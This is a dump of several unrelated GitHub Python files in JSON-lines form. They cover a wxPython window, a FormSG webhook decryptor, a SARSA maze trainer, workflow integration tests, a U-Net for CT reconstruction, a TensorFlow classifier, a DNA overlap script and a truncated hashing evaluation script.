self.timer)\n\nclass MasterWindow(wx.Frame):\n \"\"\"The frame that contains everything!\n Nothing in it, at the moment, except for test junk.\"\"\"\n def __init__(self, parent=None, ID=-1, title='Charas+'):\n super(MasterWindow, self).__init__(parent, ID, title)\n self.Show()\n\n# Test code Down There.\n\napp = wx.App()\ntest = MasterWindow()\napp.MainLoop()","repo_name":"CodyTheRat/Charas-Plus","sub_path":"src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"21057988366","text":"__all__ = ['decrypt_flask_request']\nfrom typing import Any\nfrom typing import Mapping\nfrom typing import Optional\n\nfrom .utils import decrypt_content\nfrom .utils import verify_signature\n\n\ndef decrypt_flask_request(\n 
request: Any,\n secret_key: str,\n webhook_uri: Optional[str] = None,\n signature_expiry_seconds: float = 60,\n) -> Mapping[str, Any]:\n if webhook_uri is None:\n webhook_uri = request.url\n\n verify_signature(\n webhook_uri,\n request.headers['X-FormSG-Signature'],\n signature_expiry_seconds=signature_expiry_seconds,\n )\n\n body_json: Mapping[str, Any] = request.get_json()\n\n return decrypt_content(body_json, secret_key)\n","repo_name":"fivehealth/formsg-python-sdk","sub_path":"formsg/flask.py","file_name":"flask.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"27797245364","text":"from src.rl import RL\nfrom src.enviroment import Env\nimport sys\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-l',\n default='4',\n dest='LENGTH',\n help='input the length of the grid')\n\n parser.add_argument('-i',\n default='20',\n dest='ITERATION',\n help='input the iteration of training')\n\n parser.add_argument('-d',\n default='.1',\n dest='DELAY',\n help='input delay')\n\n args = parser.parse_args()\n \n try:\n length = int(args.LENGTH)\n iteration = int(args.ITERATION)\n except ValueError:\n print('error: length or iteration must be an integer')\n sys.exit()\n\n try:\n delay = float(args.DELAY)\n except ValueError:\n print('error: delay must be an float')\n sys.exit()\n\n game = Env(length)\n rl = RL(game.get_actions())\n\n while game.episode < iteration:\n s, done = game.restart()\n a = rl.actor(s)\n while not done:\n ns, r, done = game.go(a)\n na = rl.actor(ns)\n rl.learn(s, a, r, ns, na)\n s, a = ns, na\n print(rl.q_table)\n\n","repo_name":"yutongshen/RL-SARSA-Maze","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1025318804","text":"# Created: 2023.01.05\n# Author: Vladimir Vons \n# License: GNU, see LICENSE for more details\n\n\nimport asyncio\n#\nfrom IncP import GetSysInfo\nfrom Task.Main import TTask\n\n\ndef Run():\n Info = GetSysInfo()\n PyNeed = (3, 9, 0)\n if (Info['python'] >= PyNeed):\n Task = TTask().Run()\n asyncio.run(Task)\n else:\n print(f'Need python >= {PyNeed}')\n\nif (__name__ == '__main__'):\n Run()\n","repo_name":"VladVons/py-vShops","sub_path":"src/vShops.py","file_name":"vShops.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41267689219","text":"import os\nimport json\nimport unittest\n\n\ndef read_json_file(file_path):\n with open(file_path) as file_obj:\n data = json.load(file_obj)\n return data\n\n\nclass TestReadJsonFile(unittest.TestCase):\n def setUp(self) -> None:\n print(\"Setup is called\")\n self.root_dir = os.path.abspath(os.path.dirname(__name__))\n print(self.root_dir)\n self.file_name = 'info.json'\n self.file_data = [\n {\n \"name\": \"Vikrant\",\n \"hobby\": [\"Coding\", \"Reading blogs\"]\n }\n ]\n with open(os.path.join(self.root_dir, self.file_name), mode='w') as file_obj:\n json.dump(self.file_data, file_obj, indent=2)\n\n def tearDown(self) -> None:\n print(\"Tear Down is called\")\n path = os.path.join(self.root_dir, self.file_name)\n if os.path.exists(path):\n os.remove(path)\n\n def test_read_json_file(self):\n print(\"test read_json_file\")\n response = read_json_file(file_path=os.path.join(self.root_dir, self.file_name))\n # assert 
response[0]['name'] == self.file_data[0]['name']\n # assert response[0]['hobby'][0] == self.file_data[0]['hobby'][0]\n # assert response[0]['hobby'][1] == self.file_data[0]['hobby'][1]\n self.assertListEqual(response, self.file_data)\n","repo_name":"Nareshwill/playground","sub_path":"scratch_8.py","file_name":"scratch_8.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11412767400","text":"import json\n\nfrom deciders.test_01 import test_01\nfrom deciders.test_02 import test_02\nfrom deciders.test_03 import test_03\nfrom deciders.test_04 import test_04\nfrom deciders.test_05 import test_05\nfrom deciders.test_06 import test_06\nfrom deciders.test_07 import test_07\nfrom deciders.test_08 import test_08\nfrom deciders.test_09 import test_09\nfrom deciders.test_10 import test_10\nfrom deciders.test_11 import test_11\nfrom deciders.test_12 import test_12\nfrom deciders.test_13 import test_13\nfrom deciders.test_14 import test_14\nfrom deciders.test_15 import test_15\nfrom deciders.test_16 import test_16\nfrom deciders.test_17 import test_17\nfrom test_helper import get_activity_result, docprint, print_result, print_details\n\nfrom activity_worker import ActivityWorkerProcess\n\nworker1 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')\nworker2 = ActivityWorkerProcess(domain='floto_test', task_list='floto_activities')\nworker1.start()\nworker2.start()\n\n@docprint\ndef run_01():\n \"\"\"\n Test 01\n Single task with context\n\n \"\"\"\n result = test_01()\n result_activity_1 = get_activity_result(result, 'activity1', 'v5')\n print_result(result)\n assert result_activity_1['workflow'] == {'foo': 'bar'}\n assert result_activity_1['status'] == 'finished'\n\n\n@docprint\ndef run_02():\n \"\"\"Test 02\n Single task without context\n\n \"\"\"\n result = test_02()\n result_activity_2 = get_activity_result(result, 'activity2', 'v4')\n print_result(result)\n assert result_activity_2['status'] == 'finished'\n\n\n@docprint\ndef run_03():\n \"\"\"Test 03\n Two tasks without dependency, run in parallel if > 1 worker\n\n \"\"\"\n result = test_03()\n result1 = get_activity_result(result, 'activity1', 'v5')\n result2 = get_activity_result(result, 'activity2', 'v4')\n print_result(result)\n\n assert result1['workflow'] == {'foo': 'bar'}\n assert result1['status'] == 'finished'\n assert result2['status'] == 'finished'\n\n\n@docprint\ndef run_04():\n \"\"\"Test 04\n Two tasks with 1 -> 3\n\n \"\"\"\n result = test_04()\n result3 = get_activity_result(result, 'activity3', 'v2')\n print_result(result)\n\n assert result3['activity1']['status'] == 'finished'\n assert result3['activity1']['workflow'] == {'foo': 'bar'}\n assert result3['status'] == 'finished'\n\n\n@docprint\ndef run_05():\n \"\"\"Test 05\n Failing task with retry strategy, succeeds after retry\n\n \"\"\"\n result = test_05()\n result3 = get_activity_result(result, 'activity_fails_3', 'v2')\n print_result(result)\n assert result3['workflow_input'] == {'foo': 'bar'}\n assert result3['status'] == 'finished'\n\n\n@docprint\ndef run_06():\n \"\"\"Test 06\n Failing task with retry strategy, reaches limit of retries\n\n \"\"\"\n details = test_06()\n details2 = get_activity_result(details, 'activity_fails_2', 'v2')\n print_details(details)\n assert details2 == 'Something went wrong'\n\n\n@docprint\ndef run_07():\n \"\"\"Test 07\n Timeout\n\n \"\"\"\n result = test_07()\n result2 = get_activity_result(result, 'activity2', 'v4')\n 
print_result(result)\n assert result2['status'] == 'finished'\n\n\n@docprint\ndef run_08():\n \"\"\"Test 08\n Repeated Workflow\n\n \"\"\"\n result = test_08()\n print_result(result)\n result1 = get_activity_result(result, 'activity1', 'v5')\n assert result1['status'] == 'finished'\n\n\n@docprint\ndef run_09():\n \"\"\"Test 09\n Repeated Workflow with timer and failing activity with retries\n\n \"\"\"\n result = test_09()\n print_result(result)\n result4 = get_activity_result(result, 'activity4', 'v2')\n assert [r for r in result4.keys() if 'activity1' in r]\n assert [r for r in result4.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_10():\n \"\"\"Test 10\n Testing heartbeat: Heartbeat(20s) < execution time of activity5_v2 (30s)\n \"\"\"\n\n result = test_10()\n result = get_activity_result(result, 'activity5', 'v2')\n print('Result: ' + json.dumps(result) + '\\n')\n assert result['status'] == 'finished'\n\n\n@docprint\ndef run_11():\n \"\"\"Test 11\n Decider times out, succeeds after next decision task\n Prints a warning due to Decider timeout\n \"\"\"\n\n result = test_11()\n result = get_activity_result(result, 'activity1', 'v5')\n print('Result: ' + json.dumps(result) + '\\n')\n assert result['workflow'] == {'foo': 'bar'}\n assert result['status'] == 'finished'\n\n\n@docprint\ndef run_12():\n \"\"\"Test 12\n run_09 with 2 parallel deciders\n \"\"\"\n\n result = test_12()\n result = get_activity_result(result, 'activity4', 'v2')\n print('Result: ' + json.dumps(result) + '\\n')\n assert [r for r in result.keys() if 'activity1' in r]\n assert [r for r in result.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_13():\n \"\"\"Test 13\n Two parallel deciders, one of them times out\n\n \"\"\"\n result = test_13()\n print_result(result)\n result4 = get_activity_result(result, 'activity4', 'v2')\n assert [r for r in result4.keys() if 'activity1' in r]\n assert [r for r in result4.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_14():\n \"\"\"Test 14\n Simple test with child workflow\n\n \"\"\"\n result = test_14()\n print_result(result)\n result_cw = get_activity_result(result, 'test_child_workflow', 'v2')\n assert [r for r in result_cw.keys() if 'activity2' in r]\n\n\n@docprint\ndef run_15():\n \"\"\"Test 15\n Workflow schedules a child workflow.\n\n \"\"\"\n result = test_15()\n print_result(result)\n result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')\n result_activity = get_activity_result(result_child_workflow, 'activity1', 'v5')\n assert result_activity['status'] == 'finished'\n\n\n@docprint\ndef run_16():\n \"\"\"Test 16\n Failing Task in ChildWorkflow\n\n \"\"\"\n result = test_16()\n print_result(result)\n result_child_workflow = get_activity_result(result, 'test_child_workflow', 'v2')\n result_activity = get_activity_result(result_child_workflow, 'activity_fails_2', 'v2')\n assert result_activity == 'Something went wrong'\n\n@docprint\ndef run_17():\n \"\"\"Test 17\n Activity generates tasks. 
Two deciders, one times out.\n \"\"\"\n result = test_17()\n print_result(result)\n result_activity_6 = get_activity_result(result, 'activity6', 'v1')\n assert set(result_activity_6) == set(['a.in', 'b.in'])\n\ntests = [run_01, run_02, run_03, run_04, run_05, run_06, run_07, run_08, run_09, run_10, run_11,\n run_12, run_13, run_14, run_15, run_16, run_17]\n\ntry:\n [t() for t in tests]\nexcept (KeyboardInterrupt, SystemExit):\n worker1.terminate()\n worker2.terminate()\n\nprint()\nprint('All workflows finished successfully.')\n\nworker1.terminate()\nworker2.terminate()\n","repo_name":"babbel/floto","sub_path":"tests/integration/test_swf.py","file_name":"test_swf.py","file_ext":"py","file_size_in_byte":6675,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"}
{"seq_id":"31415004697","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom collections import OrderedDict\nimport sys\nimport config\nimport os\nimport torch.nn.functional as F\nimport BaseAlg\n\n\n###\n###\n### Method based on applying a U-Net denoiser on top of the FBP reconstruction\n###\n###\n\n\n###\n### UNET implementation from github.com/usuyama/pytorch-unet\n###\nclass double_conv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(double_conv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, 3,padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_ch, out_ch, 3,padding=1),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, x):\n x = self.conv(x)\n return x\nclass inconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(inconv, self).__init__()\n self.conv = double_conv(in_ch, out_ch)\n\n def forward(self, x):\n x = self.conv(x)\n return x\nclass down(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(down, self).__init__()\n self.mpconv = nn.Sequential(\n nn.MaxPool2d(2),\n double_conv(in_ch, out_ch)\n )\n\n def forward(self, x):\n x = self.mpconv(x)\n return x\nclass up(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(up, self).__init__()\n self.up = nn.ConvTranspose2d(in_ch//2, in_ch//2, 2, stride=2)\n self.conv = double_conv(in_ch, out_ch)\n\n def forward(self, x1, x2):\n x1 = self.up(x1)\n diffY = x2.size()[2] - x1.size()[2] #Won't work for 3d Images\n diffX = x2.size()[3] - x1.size()[3]\n x1 = F.pad(x1, (diffX // 2, diffX - diffX//2, diffY // 2, diffY - diffY//2))\n x = torch.cat([x2, x1], dim=1)\n x = self.conv(x)\n return x\nclass outconv(nn.Module):\n def __init__(self, in_ch, out_ch):\n super(outconv, self).__init__()\n self.conv = nn.Conv2d(in_ch, out_ch, 1)\n\n def forward(self, x):\n x = self.conv(x)\n return x\nclass MyNet(nn.Module):\n def __init__(self, args):\n super(MyNet, self).__init__()\n self.hypers={}\n self.inc = inconv(1, 64)\n self.down1 = down(64, 128)\n self.down2 = down(128, 256)\n self.down3 = down(256, 512)\n self.down4 = down(512, 512)\n self.up1 = up(1024, 256)\n self.up2 = up(512, 128)\n self.up3 = up(256, 64)\n self.up4 = up(128, 64)\n self.outc = outconv(64, 1)\n\n def forward(self, x):\n x = config.fbp_op_mod(x)\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n x = self.outc(x)\n return x\n\n def init_weights(self,m):\n pass\n\nclass Algorithm(BaseAlg.baseNet):\n def __init__(self,args,data_loaders,path=config.data_path+'nets/'):\n super(Algorithm, 
self).__init__(args,path,MyNet(args),data_loaders)\n","repo_name":"Zakobian/CT_framework_","sub_path":"Algorithms/FBP+U.py","file_name":"FBP+U.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"36001040502","text":"import math\n\nwhile True:\n flag = True\n l = input().split(\" \")\n if len(l) == 2:\n m, n = map(int, l)\n for num in range(m, n+1):\n a, b, c = map(int, [str(num)[0],str(num)[1],str(num)[2]])\n if (a**3 + b**3 + c**3) == num:\n print(num, end=' ')\n flag = False\n if flag:\n print('no', end=' ')\n print()","repo_name":"xichie/pythonCode","sub_path":"练习/考试/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6992572774","text":"import argparse\nimport numpy as np\nimport tensorflow as tf\nimport os\nimport sys\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nROOT_DIR = os.path.dirname(os.path.dirname(BASE_DIR))\nsys.path.append(ROOT_DIR)\nsys.path.append(os.path.join(ROOT_DIR, 'models'))\nsys.path.append(os.path.join(ROOT_DIR, 'utils'))\nsys.path.append(os.path.join(os.path.dirname(BASE_DIR), 'data'))\nimport data_off\nimport pymesh\nimport cv2\nimport model_vgg as model\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--gpu', type=str, default='0', help='GPU to use [default: GPU 0]')\nparser.add_argument('--log_dir', default='/home/laughtervv/Documents/projects/pointnet_ffd/shapenet/rendered_img/checkpoint/all_vgg_template_lap_recon_lr4_ftfromchair_multigpu_cont_fixbatch_fixspace_cont', help='Log dir [default: log]')\nFLAGS = parser.parse_args()\n\nGPU_INDEX = FLAGS.gpu\nPRETRAINED_MODEL_PATH = FLAGS.log_dir\nNUM_POINTS = 2048\nIMG_SIZE = 137\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = GPU_INDEX\n\ndef pc_normalize(pc):\n\n \"\"\" pc: NxC, return NxC \"\"\"\n l = pc.shape[0]\n\n centroid = np.mean(pc, axis=0)\n\n pc = pc - centroid\n m = np.max(np.sqrt(np.sum(pc ** 2, axis=1)))\n\n pc = pc / m\n\n return pc\n\ndef demo():\n with tf.device('/gpu:0'):\n for i in range(2,4):\n src_verts, src_tris = data_off.read_off('%02d_input.off' % i)\n src_verts = pc_normalize(src_verts)\n mesh = pymesh.form_mesh(src_verts, src_tris)\n mesh, _ = pymesh.split_long_edges(mesh, 0.03)\n src_verts, src_tris = mesh.vertices, mesh.faces\n ref_img = cv2.imread('%02d_ref.png' % i, cv2.IMREAD_UNCHANGED)[:,:,:3].astype(np.float32) / 255.\n # ref_img = cv2.imresize(ref_img, (137,137))\n # cv2.imwrite('%02d_ref.png' % i, (ref_img * 255).astype(np.int8))\n # print(ref_img.shape)\n # print(ref_img.shape)\n\n src_mesh = model.mesh_placeholder_inputs(1, src_verts.shape[0], src_tris.shape[0], (IMG_SIZE,IMG_SIZE), 'src')\n ref_mesh = model.mesh_placeholder_inputs(1, src_verts.shape[0], src_tris.shape[0], (IMG_SIZE,IMG_SIZE), 'ref')\n is_training_pl = tf.placeholder(tf.bool, shape=())\n\n end_points = model.get_model(src_mesh, ref_mesh, NUM_POINTS, is_training_pl)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n config.log_device_placement = False\n sess = tf.Session(config=config)\n\n # Init variables\n init = tf.global_variables_initializer()\n sess.run(init)\n\n saver = tf.train.Saver() \n ckptstate = tf.train.get_checkpoint_state(PRETRAINED_MODEL_PATH)\n if ckptstate is not None:\n LOAD_MODEL_FILE = os.path.join(PRETRAINED_MODEL_PATH, os.path.basename(ckptstate.model_checkpoint_path))\n 
saver.restore(sess, LOAD_MODEL_FILE)\n print( \"Model loaded in file: %s\" % LOAD_MODEL_FILE)\n\n else:\n print( \"Fail to load modelfile: %s\" % PRETRAINED_MODEL_PATH)\n return\n\n\n feed_dict = {is_training_pl: False,}\n feed_dict[src_mesh['verts']] = np.expand_dims(src_verts, axis = 0)\n feed_dict[src_mesh['nverts']] = np.expand_dims([src_verts.shape[0]], axis = 0)\n feed_dict[src_mesh['tris']] = np.expand_dims(src_tris, axis = 0)\n feed_dict[src_mesh['ntris']] = np.expand_dims([src_tris.shape[0]], axis = 0)\n\n feed_dict[ref_mesh['verts']] = np.expand_dims(src_verts, axis = 0) # not using\n feed_dict[ref_mesh['nverts']] = np.expand_dims([src_verts.shape[0]], axis = 0) # not using\n feed_dict[ref_mesh['tris']] = np.expand_dims(src_tris, axis = 0) # not using\n feed_dict[ref_mesh['ntris']] = np.expand_dims([src_tris.shape[0]], axis = 0) # not using\n feed_dict[ref_mesh['imgs']] = np.expand_dims(ref_img, axis = 0)\n\n \n pred_verts_val = sess.run(end_points['pred_verts'], feed_dict=feed_dict)\n data_off.write_off('%02d_deformed.off' % i, pred_verts_val[0,:,:], src_tris)\n tf.reset_default_graph()\n\n\nif __name__ == \"__main__\":\n demo()","repo_name":"laughtervv/3DN","sub_path":"shapenet/2D/demo_2D.py","file_name":"demo_2D.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"48"} +{"seq_id":"72336773907","text":"'''\n@Description: This is the basis model of the \n@Author: your name\n@Date: 2019-07-13 22:55:34\n@LastEditTime: 2019-07-22 16:54:44\n@LastEditors: Please set LastEditors\n'''\nimport tensorflow as tf \nfrom tensorflow.python import debug as tf_debug\nimport abc\nfrom functools import reduce\nimport datetime\nimport numpy as np\nclass Model(object):\n \"\"\"\n this is the basis model\n :param object: \n \"\"\"\n def __init__(self,opt):\n # initialize the parameters\n for key, value in opt.items():\n self.__setattr__(key, value)\n\n sess_config = tf.ConfigProto()\n sess_config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=sess_config)\n self.para = []\n self.build_graph()\n # summary\n self.merged = tf.summary.merge_all()\n # self.train_writer = tf.summary.FileWriter(self.summaries_dir + '/train',\n # self.sess.graph)\n # self.test_writer = tf.summary.FileWriter(self.summaries_dir + '/test')\n self.saver = tf.train.Saver()\n self.sess.run(tf.global_variables_initializer())\n\n # whether debug the code\n # if self.debug:\n # self.sess = tf_debug.LocalCLIDebugWrapperSession(self.sess)\n def _create_placeholder(self):\n self.sentence = tf.placeholder(tf.int32,[None,self.max_input_sentence],name = 'input_question')\n self.input_y = tf.placeholder(tf.float32, [None,2], name = \"input_y\")\n self.sentence_position = tf.placeholder(tf.int32,[None,self.max_input_sentence],name = 'q_position')\n \n @abc.abstractmethod\n def _get_embedding(self):\n \"\"\"\n abstract method\n :param self: \n \"\"\"\n def _feed_neural_work(self):\n with tf.name_scope('regression'):\n regularizer = tf.contrib.layers.l2_regularizer(self.l2_reg_lambda)\n W = tf.get_variable(\n \"W_output\",\n shape = [self.embedding_dim, 2],\n initializer = tf.contrib.layers.xavier_initializer(),\n regularizer=regularizer)\n b = tf.get_variable('b_output', shape=[2],initializer = tf.random_normal_initializer(),regularizer = regularizer)\n self.para.append(W)\n self.para.append(b)\n self.logits = tf.nn.xw_plus_b(self.represent, W, b, name = \"scores\")\n self.scores = tf.nn.softmax(self.logits)\n self.predictions = 
tf.argmax(self.scores, 1, name = \"predictions\")\n\n def _create_loss(self):\n l2_loss = tf.constant(0.0)\n for p in self.para:\n l2_loss += tf.nn.l2_loss(p)\n with tf.name_scope(\"loss\"):\n losses = tf.nn.softmax_cross_entropy_with_logits(logits = self.logits, labels = self.input_y)\n self.loss = tf.reduce_mean(losses) + self.l2_reg_lambda*l2_loss\n\n with tf.name_scope(\"accuracy\"):\n correct_predictions = tf.equal(self.predictions, tf.argmax(self.input_y, 1))\n self.accuracy = tf.reduce_mean(tf.cast(correct_predictions, \"float\"), name=\"accuracy\")\n\n def _create_op(self):\n \n self.global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n self.optimizer = tf.train.AdamOptimizer(self.learning_rate)\n self.grads_and_vars = self.optimizer.compute_gradients(self.loss)\n self.train_op = self.optimizer.apply_gradients(\n self.grads_and_vars, global_step=self.global_step)\n\n def variable_summaries(self, var):\n with tf.name_scope('summaries'):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\n @staticmethod\n def _model_stats():\n \"\"\"Print trainable variables and total model size.\"\"\"\n\n def size(v):\n return reduce(lambda x, y: x * y, v.get_shape().as_list())\n print(\"Trainable variables\")\n for v in tf.trainable_variables():\n print(\" %s, %s, %s, %s\" %\n (v.name, v.device, str(v.get_shape()), size(v)))\n print(\"Total model size: %d\" % (sum(size(v)\n for v in tf.trainable_variables())))\n\n\n def _train(self,data_batch,i):\n\n for data in data_batch:\n sentence,flag,position = zip(*data)\n feed_dict = {\n self.sentence: sentence,\n self.input_y: flag,\n self.sentence_position: position\n }\n _, step, loss, accuracy = self.sess.run(\n [self.train_op, self.global_step, self.loss, self.accuracy],feed_dict)\n time_str = datetime.datetime.now().isoformat()\n print(\"{}: step {}, loss {:g}, acc {:g} \".format( time_str, step, loss, accuracy))\n def _predict(self,data_batch):\n scores = []\n for data in data_batch:\n sentence,_,position = zip(*data)\n feed_dict = {\n self.sentence: sentence,\n self.sentence_position: position\n }\n score = self.sess.run(self.scores, feed_dict)\n scores.extend(score)\n return np.array(scores)\n\n def build_graph(self):\n self._create_placeholder()\n self._get_embedding()\n self._feed_neural_work()\n self._create_loss()\n self._create_op()\n\n\n\n","repo_name":"zhaodongh/Encoding-Word-Order-in-Complex-valued-Embedding","sub_path":"Fasttext/model_fasttext/basic_model.py","file_name":"basic_model.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"48"} +{"seq_id":"10658136246","text":"#!/usr/bin/env python\nimport sys\nfrom datetime import datetime, date, time\n\n# Debugging variables\ndebug = True\nunit_test = True\n\ndef func1():\n return\n\nseqs = []\nseq = \"\"\nnumseq=[]\nseq_id=[]\n\n#a=0,c=1,g=2,t=3\n\nread_fname = \"lab01.fasta\"\n#read_fname = \"sample_data/sample.fasta\"\nfor line in open(read_fname):\n line = line.strip()\n if line[0] == '>':\n if seq != \"\":\n for i in range(0,len(seq)):\n if seq[i]=='a':\n numseq.append(0)\n elif seq[i]=='c':\n numseq.append(1)\n elif seq[i]=='g':\n numseq.append(2)\n else:\n numseq.append(3)\n seqs.append([seq_id, numseq])\n 
seq_id = line[1:]\n seq = \"\"\n numseq=[]\n else:\n seq += line\n\nif seq != \"\":\n for i in range(0,len(seq)):\n if seq[i]=='a':\n numseq.append(0)\n elif seq[i]=='c':\n numseq.append(1)\n elif seq[i]=='g':\n numseq.append(2)\n else:\n numseq.append(3)\n seqs.append([seq_id, numseq])\n \nlengthofseqs=len(seqs) \nlengthofnumseq=len(seqs[0][1])\n\ntempfront=[]\ntemprear=[]\ntemp=[]\nreversetemp=[]\n\ndef simple_overlap(a, b):\n def simple_overlap_dir(a, b):\n for i in range(len(a)):\n same = True\n for j in range(len(a) - i):\n if a[j] != b[i + j]:\n same = False\n break\n if same and len(a) - i >= 40:\n return len(a) - i\n return None\n\n b_rc = reversecomplement(b)\n olp = simple_overlap_dir(a, b)\n if olp != None:\n return 'F', olp\n olp = simple_overlap_dir(b, a)\n if olp != None:\n return 'F', -olp\n simple_overlap_dir(a, b_rc)\n simple_overlap_dir(b_rc, a)\n \n return None, None\n \n\ndef jj_overlap(a, b):\n tempfront=a[:20]\n temprear=a[-20:]\n reversetemp=reversecomplement(b)\n for k in range(20,lengthofnumseq-20):\n temp=b[k:k+20]\n if temprear==temp:\n if 21+k<lengthofnumseq:\n print >> overlap_file, seqs[i][0], seqs[j][0], \"F\",lengthofnumseq-k-20\n temp=reversetemp[k:k+20] \n if temprear==temp:\n if 21+k<lengthofnumseq:\n print >> overlap_file, seqs[i][0], seqs[j][0], \"R\",lengthofnumseq-k-20\n temp=seqs[j][1][-k-20:-k] \n if tempfront==temp:\n if 21+k<lengthofnumseq:\n print >> overlap_file, seqs[i][0], seqs[j][0], \"F\",k+20-lengthofnumseq\n\n temp=reversetemp[-k-20:-k] \n if tempfront==temp:\n if 21+k<lengthofnumseq:\n print >> overlap_file, seqs[i][0], seqs[j][0], \"R\",k+20-lengthofnumseq\n\n\ndef reversecomplement(arr):\n arrs = []\n i=0\n for i in range(len(arr)):\n arrs.append(3-arr[i])\n arrs=arrs[::-1] \n return arrs\n\n# Unit tests\nif unit_test:\n test1 = [\"tttggtgtgtgcacaagttaagtcgtgtacgcgtgggacaacctacactcttcgtcgtaccggatgcacgactgtgacgtactgaggtagcctaaggacgaaatgctttacgttgccagtcctgtaaacggggccaagaccgtccaagtcccaaccacctaggcccccgataatgcccgcgatggagacggaaatggagaggtgaacgtcagccccggccccgccgatcctattcgctgagtatagacgg\", \"cgatggagacggaaatggagaggtgaacgtcagccccggccccgccgatcctattcgctgagtatagacggagcgcgtacagtgccatgtgaatggcgcgggcatgcacgacataagttgaaggggggaaaaggccatctctggcttagtgcgattaagccccgccgtacccgcccctgcctggcgtcgacgacgacgcgcgacaacgaacagacacggcgcaagatagatgacccttgcttgatcttaa\", ['F', 179]]\n\n tests = [test1]\n for seq1, seq2, ans in tests:\n my_ans = jj_overlap(seq1, seq2)\n assert my_ans == ans\n\nprint >> sys.stderr, \"Begin at\", str(datetime.now())\noverlap_file = open(\"lab01.olaps\", \"w\")\nfor i in range(lengthofseqs):\n for j in range(i+1, lengthofseqs):\n jj_dir, jj_olap = jj_overlap(a, b)\n if debug:\n s_dir, s_olap = simple_overlap(a, b)\n if jj_dir != s_dir or jj_olap != s_olap:\n print >> sys.stderr, \"Something went wrong in JJ overlapping!\"\n \n\n \noverlap_file.close()\nprint >> sys.stderr, \"Ends at\", str(datetime.now())\n","repo_name":"leejj82/compbio","sub_path":"lab1/3. Old_Code/hw17_Daehwan'sEdition.py","file_name":"hw17_Daehwan'sEdition.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"23010600104","text":"\"\"\"\nThis does hash-specific testing:\n- precision within hamming radius\n- precision vs. 
recall curve\n\"\"\"\nimport torch, itertools, os\nfrom ml_toolkit.hash_toolkit.metrics.precision_recall import get_mean_avg_precision, calculate_precision_recall, get_precision_vs_recall, \\\n plot_avg_precision_vs_recall\n\nfrom expr_suites.upper_bound.testing_utils import _get_data_loader, _construct_hash_function, _create_label_hash_dicts, _load_models_from_path, _save_hash_code\n\n# ml_test hashing performance\ndef testing(params,models,query_data_loader,db_data_loader,use_specific_code,use_shared_code,model_def):\n \"\"\"\n :param models: a dict {name:model_obj}\n :param query_data_loader: a torch.utils.dataloader\n :param db_data_loader: a torch.utils.dataloader\n :return: return a dict {'results':[],'records':{filename:content}}\n \"\"\"\n query_labels = []\n db_labels = []\n query_hash_ls = []\n db_hash_ls = []\n # 1. hash the whole db set and query set\n hash_model = _construct_hash_function(models=models,params=params,use_specific_code=use_specific_code,use_shared_code=use_shared_code,model_def=model_def)\n for i,(images,labels) in enumerate(db_data_loader):\n db_hash_ls += hash_model(images)\n db_labels += labels.numpy().tolist()\n for i, (images, labels) in enumerate(query_data_loader):\n query_hash_ls += hash_model(images)\n query_labels += labels.numpy().tolist()\n print(\"hashing finished\")\n\n # 2. format data for ml_test\n db_set = _create_label_hash_dicts(hash_ls=db_hash_ls, label_ls=db_labels)\n query_set = _create_label_hash_dicts(hash_ls=query_hash_ls, label_ls=query_labels)\n\n # 3. do query for each data in `query_set`, compute precision, recall\n 